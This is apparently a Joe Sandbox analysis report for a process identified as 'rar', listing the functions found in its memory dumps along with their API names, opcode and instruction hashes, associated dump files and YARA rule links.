                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE0E562B3445152DBD8A719C891FAA5790AF44B80FC02035E40AC3A54DE5CD444CB10
                                                                                                                                                                                                                                            Function 00007FF702C64A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                            • Instruction ID: fe0f17d02f2e1e6a95bbb0092decb80e4d96522dcc6affa25067a7aa4ab24a78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E08663E1954366FF3CB7F25C08177EAD16F44744F844430D90D86252EFAC6441C368
                                                                                                                                                                                                                                            Function 00007FF702C471FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9ac513db4036a5898ded250dd79eb32afe9a02ed88e0a62a20bc990054a4dda4
                                                                                                                                                                                                                                            • Instruction ID: f5136ec5bff3bcfedfb246cbb1bb306fb006404218d829b159947905073e4b89
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac513db4036a5898ded250dd79eb32afe9a02ed88e0a62a20bc990054a4dda4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EE1C523A0C682A1FB20AA249C546BBEF52EF41B98FC44135DE4D4B7D6DFED9449C720
                                                                                                                                                                                                                                            Function 00007FF702C072C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                            • Instruction ID: 64c79ab5e03b8edb121ab0ec9c68cb0473bef7f7cf56d512d8a23d00f661d840
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B512773518BD195E700AF24A8451EE7BA8FB44F88F58423ADA880B79ADF78A155C331
                                                                                                                                                                                                                                            Function 00007FF702C6231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                            • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                            • Instruction ID: e63d838e522881207e02ccdc7973aa16faa0f670a993d843fac69790ed18d8f9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341D223A09603A2FB68FB109C5827BAA95FF80B44F984435DD0D47AD1DFBCE844C365
                                                                                                                                                                                                                                            Function 00007FF702C68050 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                                                                                            • Instruction ID: f1f4e8c0f9f4e0ef1e25bee10669c58e997509a80f4d72f235d9f29a3d3fdff3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11723791C682A2E710AB50AD4867BFA94FF40344FD80A35E64D47795DFBDE404C768
                                                                                                                                                                                                                                            Function 00007FF702C14D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CommandLine
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3253501508-0
                                                                                                                                                                                                                                            • Opcode ID: a301520942a2935eed22be89f00b37226108d57f68a2d87f62cb334619445c9e
                                                                                                                                                                                                                                            • Instruction ID: 406920af65c1bc59b4f391c2f6c26e712148742d9bfb213fdc01505b07d7dfbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a301520942a2935eed22be89f00b37226108d57f68a2d87f62cb334619445c9e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2016113B0C64295EF28F716A8021BF9EA0AF86B94F980431EE4D07369DFBDD441C324
                                                                                                                                                                                                                                            Function 00007FF702C64B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                            • Instruction ID: 51ee4b1526496f8f8a204d1e7f875439580121b233e206a3496e92cea626889b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71015E46A0CA4364FB7CB6669E4867BF9915F84BD4FC88230DD1D462D6EFADA401C238
                                                                                                                                                                                                                                            Function 00007FF702C4A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1825529933-0
                                                                                                                                                                                                                                            • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                            • Instruction ID: ab79c69d1e7082899a6f46187a998a321fb3e193e172480605e05da6b5773648
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF012162B0869255EB107B12A80406BEB11AF99FC0F984434EE8D8BB5ACFACD0428718
                                                                                                                                                                                                                                            Function 00007FF702C64B14 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                                                                                            • Instruction ID: 26ba061deaa82b322bbbe4d884c55fcae358449cac1d852bbb2fef8823c733bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F0315AB09A0365FF7D76619D083B6EA551F88B90F8C6430C90D46291EF9CE440C238
                                                                                                                                                                                                                                            Function 00007FF702C24554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                            • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                                            • Instruction ID: 3121d0691252da345b8edb2167b65a5846d20f2cd4d932a695f164baebc04d94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89F06232A082C156DB15AB6199012F9AA50AF06BB4F484375DEBC0B2C7CF9C9088C730
                                                                                                                                                                                                                                            Function 00007FF702C64AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                            • Instruction ID: 119f810966f7cca58b8ebe42aa7af2d57fb5e86c7d426558af4d2b6af6522bbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
